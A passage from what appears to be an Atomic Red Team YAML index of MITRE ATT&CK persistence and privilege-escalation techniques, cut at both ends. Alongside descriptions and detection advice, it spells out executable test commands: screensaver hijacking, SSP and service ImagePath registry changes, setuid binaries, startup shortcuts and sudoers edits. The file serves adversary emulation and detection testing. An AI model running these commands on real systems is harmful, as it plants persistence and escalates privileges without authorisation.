(HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: - - * SCRNSAVE.exe - set to malicious PE path - * ScreenSaveActive - set to '1' to enable the screensaver - * ScreenSaverIsSecure - set to '0' to not require a password to unlock - * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed - - Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) - id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-23T12:23:04.955Z' - created: '2020-01-24T13:51:01.210Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. - - Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. - x_mitre_data_sources: - - File monitoring - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Bartosz Jerzman - x_mitre_platforms: - - Windows - identifier: T1546.002 - atomic_tests: - - name: Set Arbitrary Binary as Screensaver - auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - description: 'This test copies a binary into the Windows System32 folder and - sets it as the screensaver so it will execute for persistence. Requires a - reboot and logon. - -' - supported_platforms: - - windows - input_arguments: - input_binary: - description: Executable binary to use in place of screensaver for persistence - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f - shutdown /r /t 0 - name: command_prompt - elevation_required: true - T1547.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.005 - url: https://attack.mitre.org/techniques/T1547/005 - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. - source_name: Microsoft Configure LSA - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Security Support Provider - description: |- - Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. - - The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) - id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:42:48.910Z' - created: '2020-01-24T17:16:11.806Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned SSP DLLs try to load into the LSA by - setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1547.005 - atomic_tests: - - name: Modify SSP configuration in registry - auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - description: Add a value to a Windows registry SSP key, simulating an adversarial - modification of those keys. - supported_platforms: - - windows - input_arguments: - fake_ssp_dll: - description: Value added to registry key. Normally refers to a DLL name - in C:\Windows\System32. - type: String - default: not-a-ssp - executor: - command: | - # run these in sequence - $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' - $SecurityPackagesUpdated = $SecurityPackages - $SecurityPackagesUpdated += "#{fake_ssp_dll}" - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated - - # revert (before reboot) - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages - name: powershell - elevation_required: true - T1574.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.010 - url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-17 - source_name: capec - url: https://capec.mitre.org/data/definitions/17.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:10:04.262Z' - created: '2020-03-12T20:43:53.998Z' - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Services - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: "Look for changes to binaries and service executables that - may normally occur during software updates. If an executable is written, renamed, - and/or moved to match an existing service executable, it could be detected - and correlated with other suspicious behavior. Hashing of binaries and service - executables could be used to detect replacement against historical data.\n\nLook - for abnormal process call trees from typical processes and services and for - execution of other commands that could relate to Discovery or other adversary - techniques. " - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.011 - url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - source_name: Registry Key Security - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. - Retrieved March 16, 2017. - - source_name: Kansa Service related collectors - url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html - description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and - analysis. Retrieved October 10, 2019.' - - source_name: Tweet Registry Perms Weakness - url: https://twitter.com/r0wdy_/status/936365549553991680 - description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved - April 9, 2018." - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services Registry Permissions Weakness - description: "Adversaries may execute their own malicious payloads by hijacking - the Registry entries used by services. Adversaries may use flaws in the permissions - for registry to redirect from the originally specified executable to one that - they control, in order to launch their own code at Service start. Windows - stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. - The information stored under a service's Registry keys can be manipulated - to modify a service's execution parameters through tools such as the service - controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), - or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys - is controlled through Access Control Lists and permissions. (Citation: Registry - Key Security)\n\nIf the permissions for users and groups are not properly - set and allow access to the Registry keys for a service, then adversaries - can change the service binPath/ImagePath to point to a different executable - under their control. When the service starts or is restarted, then the adversary-controlled - program will execute, allowing the adversary to gain persistence and/or privilege - escalation to the account context the service is set to execute under (local/domain - account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also - alter Registry keys associated with service failure parameters (such as FailureCommand) - that may be executed in an elevated context anytime the service fails or is - intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: - Tweet Registry Perms Weakness) " - id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:07:48.590Z' - created: '2020-03-13T11:42:14.444Z' - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - - Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - Windows Registry - - Services - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1574.011 - atomic_tests: - - name: Service Registry Permissions Weakness - auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. - reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service check - type: String - default: weakservicename - executor: - command: | - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell - - name: Service ImagePath Change with reg.exe - auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - description: 'Change Service registry ImagePath of a bengin service to a malicious - file - -' - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service name - type: String - default: calcservice - weak_service_path: - description: weak service path - type: String - default: "%windir%\\system32\\win32calc.exe" - malicious_service_path: - description: malicious service path - type: String - default: "%windir%\\system32\\cmd.exe" - dependency_executor_name: powershell - dependencies: - - description: 'The service must exist (#{weak_service_name}) - -' - prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit - 1} - -' - get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - -' - executor: - command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" - /f /v ImagePath /d "#{malicious_service_path}" - -' - cleanup_command: 'sc.exe delete #{weak_service_name} - -' - name: command_prompt - T1548.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548.001 - url: https://attack.mitre.org/techniques/T1548/001 - - url: http://man7.org/linux/man-pages/man2/setuid.2.html - description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. - Retrieved September 21, 2018. - source_name: setuid man page - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Setuid and Setgid - description: |- - An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. - - Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. - - Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). - id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-27T00:43:58.149Z' - created: '2020-01-30T14:11:41.212Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor the file system for files that have the setuid or - setgid bits set. Monitor for execution of utilities, like chmod, and their - command-line arguments to look for setuid or setguid bits being set. - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Linux - - macOS - identifier: T1548.001 - atomic_tests: - - name: Make and modify binary from C source - auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 - description: 'Make, change owner, and change file attributes on a C source code - file - -' - supported_platforms: - - macos - - linux - input_arguments: - payload: - description: hello.c payload - type: path - default: PathToAtomicsFolder/T1548.001/src/hello.c - executor: - command: | - cp #{payload} /tmp/hello.c - sudo chown root /tmp/hello.c - sudo make /tmp/hello - sudo chown root /tmp/hello - sudo chmod u+s /tmp/hello - /tmp/hello - cleanup_command: | - sudo rm /tmp/hello - sudo rm /tmp/hello.c - name: sh - elevation_required: true - - name: Set a SetUID flag on file - auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 - description: 'This test sets the SetUID flag on a file in Linux and macOS. - -' - supported_platforms: - - macos - - linux - input_arguments: - file_to_setuid: - description: Path of file to set SetUID flag - type: path - default: "/tmp/evilBinary" - executor: - command: | - sudo touch #{file_to_setuid} - sudo chown root #{file_to_setuid} - sudo chmod u+s #{file_to_setuid} - cleanup_command: 'sudo rm #{file_to_setuid} - -' - name: sh - elevation_required: true - - name: Set a SetGID flag on file - auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c - description: 'This test sets the SetGID flag on a file in Linux and macOS. - -' - supported_platforms: - - macos - - linux - input_arguments: - file_to_setuid: - description: Path of file to set SetGID flag - type: path - default: "/tmp/evilBinary" - executor: - command: | - sudo touch #{file_to_setuid} - sudo chown root #{file_to_setuid} - sudo chmod g+s #{file_to_setuid} - cleanup_command: 'sudo rm #{file_to_setuid} - -' - name: sh - elevation_required: true - T1547.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.009 - url: https://attack.mitre.org/techniques/T1547/009 - - external_id: CAPEC-132 - source_name: capec - url: https://capec.mitre.org/data/definitions/132.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Shortcut Modification - description: |- - Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. - - Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. - id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T17:21:27.487Z' - created: '2020-01-24T19:00:32.917Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Since a shortcut's target path likely will not change, modifications - to shortcut files that do not correlate with known software changes, patches, - removal, etc., may be suspicious. Analysis should attempt to relate shortcut - file change or creation events to other potentially suspicious events based - on known adversary behavior such as process launches of unknown executables - that make network connections. - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.009 - atomic_tests: - - name: Shortcut Modification - auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - description: | - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; - gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. - Upon execution, calc.exe will be launched. - supported_platforms: - - windows - input_arguments: - shortcut_file_path: - description: shortcut modified and execute - type: path - default: "%temp%\\T1547.009_modified_shortcut.url" - executor: - command: | - echo [InternetShortcut] > #{shortcut_file_path} - echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} - #{shortcut_file_path} - cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - -' - name: command_prompt - - name: Create shortcut to cmd in startup folders - auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - description: | - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" - to view the new shortcut. - supported_platforms: - - windows - executor: - command: | - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1037.005: - technique: - id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f - description: "Adversaries may use startup items automatically executed at boot - initialization to establish persistence. Startup items execute during the - final phase of the boot process and contain shell scripts or other executable - files along with configuration information used by the system to determine - the execution order for all startup items. (Citation: Startup Items)\n\nThis - is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), - and thus the appropriate folder, /Library/StartupItems isn’t - guaranteed to exist on the system by default, but does appear to exist by - default on macOS Sierra. A startup item is a directory whose executable and - configuration property list (plist), StartupParameters.plist, - reside in the top-level directory. \n\nAn adversary can create the appropriate - folders/files in the StartupItems directory to register their own persistence - mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since - StartupItems run during the bootup phase of macOS, they will run as the elevated - root user." - name: Startup Items - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.005 - url: https://attack.mitre.org/techniques/T1037/005 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:47:39.124Z' - created: '2020-01-15T18:00:33.603Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_detection: |- - The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. - - Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.005 - atomic_tests: - - name: Add file to Local Library StartupItems - auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - description: | - Modify or create an file in /Library/StartupItems - - [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) - supported_platforms: - - macos - executor: - command: 'sudo touch /Library/StartupItems/EvilStartup.plist - -' - cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - -' - name: sh - elevation_required: true - T1548.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548.003 - url: https://attack.mitre.org/techniques/T1548/003 - - url: https://www.sudo.ws/ - description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. - source_name: sudo man page 2018 - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - - url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does - description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually - Does. Retrieved March 19, 2018. - source_name: cybereason osx proton - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Sudo and Sudo Caching - description: |- - Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. - - Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). - - The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. - - Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. - - In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. - id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-27T01:03:26.306Z' - created: '2020-01-30T14:34:44.992Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - User - x_mitre_detection: On Linux, auditd can alert every time a user's actual ID - and effective ID are different (this is what happens when you sudo). This - technique is abusing normal functionality in macOS and Linux systems, but - sudo has the ability to log all input and output based on the LOG_INPUT - and LOG_OUTPUT directives in the /etc/sudoers file. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - x_mitre_platforms: - - Linux - - macOS - identifier: T1548.003 - atomic_tests: - - name: Sudo usage - auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e - description: 'Common Sudo enumeration methods. - -' - supported_platforms: - - macos - - linux - executor: - name: sh - elevation_required: true - command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" - - name: Unlimited sudo cache timeout - auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc - description: 'Sets sudo caching timestamp_timeout to a value for unlimited. - This is dangerous to modify without using ''visudo'', do not do this on a - production system. - -' - supported_platforms: - - macos - - linux - executor: - name: sh - elevation_required: true - command: | - sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers - sudo visudo -c -f /etc/sudoers - - name: Disable tty_tickets for sudo caching - auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 - description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous - to modify without using ''visudo'', do not do this on a production system. - -' - supported_platforms: - - macos - - linux - executor: - name: sh - elevation_required: true - command: |- - sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" - sudo visudo -c -f /etc/sudoers - T1543.002: - technique: - id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b - description: "Adversaries may create or modify systemd services to repeatedly - execute malicious payloads as part of persistence. The systemd service manager - is commonly used for managing background daemon processes (also known as services) - and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: - Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization - (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, - CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit - and Upstart while remaining backwards compatible with the aforementioned init - systems.\n\nSystemd utilizes configuration files known as service units to - control how services boot and under what conditions. By default, these unit - files are stored in the /etc/systemd/system and /usr/lib/systemd/system - directories and have the file extension .service. Each service - unit file may contain numerous directives that can execute system commands:\n\n* - ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands - when a services is started manually by 'systemctl' or on system start if the - service is set to automatically start. \n* ExecReload directive covers when - a service restarts. \n* ExecStop and ExecStopPost directives cover when a - service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd - functionality to establish persistent access to victim systems by creating - and/or modifying service unit files that cause systemd to execute malicious - commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries - typically require root privileges to create/modify service unit files in the - /etc/systemd/system and /usr/lib/systemd/system - directories, low privilege users can create/modify service unit files in directories - such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: - Rapid7 Service Persistence 22JUNE2016)" - name: Systemd Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.002 - url: https://attack.mitre.org/techniques/T1543/002 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - source_name: Freedesktop.org Linux systemd 29SEP2018 - url: 